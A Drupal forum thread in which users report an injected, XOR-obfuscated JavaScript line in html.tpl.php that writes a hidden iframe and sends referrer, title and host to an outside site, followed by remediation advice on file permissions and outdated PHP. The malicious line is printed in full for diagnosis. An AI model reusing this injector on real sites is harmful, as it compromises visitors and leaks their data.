Anyone has seen this hack to drupal site?

We encourage users to post events happening in the community to the community events group on https://www.drupal.org.
sf_wind's picture

I have most recent drupal version, and when logged in as admin, every page load tries to load something from the domain teaserguide.com, but fails.

I googled online but found very little discussion on this. The limited discussions I've found so far are related to wordpress. For example, this article describes the hack on wordpress:
http://sntjohnny.com/front/the-teaserguide-wordpress-hack/2683.html

This kind of hack seems to be spread only very recently. From this article, the hack sneaks into some heavily protected sites.

For me, I installed the "hacked!" module and found one file is compromised: /modules/system/html.tpl.php.

Two scripts are added to the html file, something similar to the article reported on the wordpress site.

I'm just wondering whether the drupal community is aware of this kind of hack and what are the likely cause of it.

The added line to html.tpl.php is:

var a="'1Aqapkrv'02v{rg'1F'00vgzv-hctcqapkrv'00'1G'2C'2;tcp'02pgdgpgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;'1@'2C'2;tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'2;tcp'02jmqv'02'1F'02glamfgWPKAmormlglv'0:nmacvkml,jmqv'0;'1@'2C'2;tcp'02kdpcog'02'1F'02fmawoglv,apgcvgGngoglv'0:'05kdpcog'05'0;'1@'2C'2;kdpcog,ukfvj'1F2'1@'2C'2;kdpcog,jgkejv'1F2'1@'2C'2;kdpcog,qpa'1F'02'00j'00'02)'02'00vv'00'02)'02'00r'1C--'00'02)'02'00a33l6,'00'02)'02'00k,vg'00'02)'02'00cq'00'02)'02'00gpe'00'02)'02'00wkf'00'02)'02'00g,a'00'02)'02'00mo'00'02)'02'00-qlkvaj'1Df'00'02)'02'00gd'00'02)'02'00cwn'00'02)'02'00v]i'00'02)'02'00g{'00'02)'02'00umpf'1F'00'02)'02fgdcwnv]ig{umpf'02)'02'00'04pgdg'00'02)'02'00ppgp'1F'00'02)'02pgdgpgp'02)'02'00'04qg]p'00'02)'02'00gd'00'02)'02'00gp'00'02)'02'00pgp'1F'00'02)'02pgdgpgp'02)'02'00'04qmw'00'02)'02'00pag'1F'00'02)'02jmqv'1@'2C'2;fmawoglv,`mf{,crrglfAjknf'0:kdpcog'0;'1@'2C'1A-qapkrv'1G";b="";c="";var clen;clen=a.length;for(i=0;i<clen;i++){b+=String.fromCharCode(a.charCodeAt(i)^2)}c=unescape(b);document.write(c);^M

Comments

What's your hosting

themselves's picture

What's your hosting environment? That this is targetting and getting through Wordpress, Joomla and Drupal sites makes it seem pretty unlikely they're burning the three zero days on the same petty hack... might be an unpatched cPanel hole? something like that?

I have it too

akleinwaechter's picture

My site has it too. Even Windows defender detects it as IFrameinject.AE

Best regards
Alex

I had this issue too. I

guster-von's picture

I had this issue too.

I replaced the html.tpl.php with /modules/system/html.tpl.php from Drupal 7.39 zip file.

I would love to know what caused this too...I see some information regarding Word Press sites. I am hosting with Dreamhost.

There are two general

mpdonadio's picture

There are two general causes.

One, is that your webserver (probably Apache) has write access to the core files. This happens a lot in shared hosting, where the Apache process runs as your user login. In general, this is a bad thing. See for more https://www.drupal.org/node/244924 for more info. Normally, you just want to give Apache write access to sites/default/files and your private and tmp directories (wherever they are defined).

Two, is that your hosting provider or your server is probably running an outdated version of PHP. Again, this tends to happen a lot with shared hosts (many are reluctant to keep up with latest security versions). Many outdated versions of PHP have security vulnerabilities in them, which lets attackers construct bad URLs and write to files on the filesystem. Adding code to template files is low hanging fruit that a lot of people don't notice.

Security

Group organizers

Group notifications

This group offers an RSS feed. Or subscribe to these personalized, sitewide feeds: